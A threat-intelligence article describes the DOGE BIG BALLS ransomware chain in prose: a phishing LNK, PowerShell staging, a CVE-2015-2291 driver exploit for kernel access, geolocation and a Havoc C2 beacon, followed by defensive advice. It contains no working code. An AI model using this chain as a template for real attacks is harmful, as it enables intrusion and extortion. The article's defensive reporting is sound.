Cyble researchers have recently discovered a new ransomware strain known as DOGE BIG BALLS. This ransomware is not only unique in its name but also showcases a high level of technical sophistication, coupled with psychological manipulation tactics.
The genesis of the DOGE BIG BALLS attack can be traced back to a deceptive ZIP file titled “Pay Adjustment.zip” that is distributed through phishing emails. Inside this ZIP file is a malicious shortcut file named “Pay Adjustment.pdf.lnk” which, when activated, executes PowerShell commands to initiate a multi-stage infection process. The first stage involves checking for administrative privileges and downloading a modified version of the Fog ransomware disguised as “Adobe Acrobat.exe” within a hidden system directory.
The attackers exploit a critical vulnerability, CVE-2015-2291, in Intel’s Ethernet diagnostics driver (iqvw64e.sys) to gain kernel-level privileges. By leveraging this flaw, the ransomware process can elevate its privileges, disable security logging, and establish persistence within the compromised system.
One of the notable aspects of the DOGE BIG BALLS ransomware is its use of psychological manipulation tactics. The ransomware’s name, “DOGE BIG BALLS,” is a deliberate attempt to associate the attack with Edward Coristine and Elon Musk’s DOGE initiative. By linking the ransomware to Coristine and including his personal details in the ransom note, the attackers aim to misdirect investigations and intimidate victims.
In addition to encryption, the attackers also employ advanced reconnaissance and geolocation techniques to gather information about their victims. They use scripts to collect system and network data, which is then transmitted to the attackers via a cloud hosting platform. Furthermore, the attackers leverage the Wigle.net API to determine the exact geographic location of the victim, enabling precise geolocation tracking.
The post-exploitation phase of the attack involves the use of a Havoc C2 beacon (demon.x64.dll) to maintain communication with the attackers’ command and control infrastructure. This beacon allows the attackers to issue further instructions or exfiltrate additional data from the compromised system.
The involvement of Edward Coristine in the ransom note is a case of misattribution by the attackers. Coristine, who is associated with the DOGE initiative, has no connection to the cybercrime. The attackers strategically use his name to create a false narrative and exploit his public profile for credibility.
To combat DOGE BIG BALLS ransomware attacks, organizations and individuals must adopt proactive defense strategies. This includes enforcing strict execution policies, monitoring PowerShell activity, deploying endpoint detection and response solutions, limiting administrative privileges, and blocking unauthorized outbound connections.
In conclusion, the DOGE BIG BALLS ransomware presents a significant threat due to its technical sophistication, psychological manipulation tactics, and misdirection strategies. It is imperative for organizations to enhance their cybersecurity measures to protect against such advanced threats.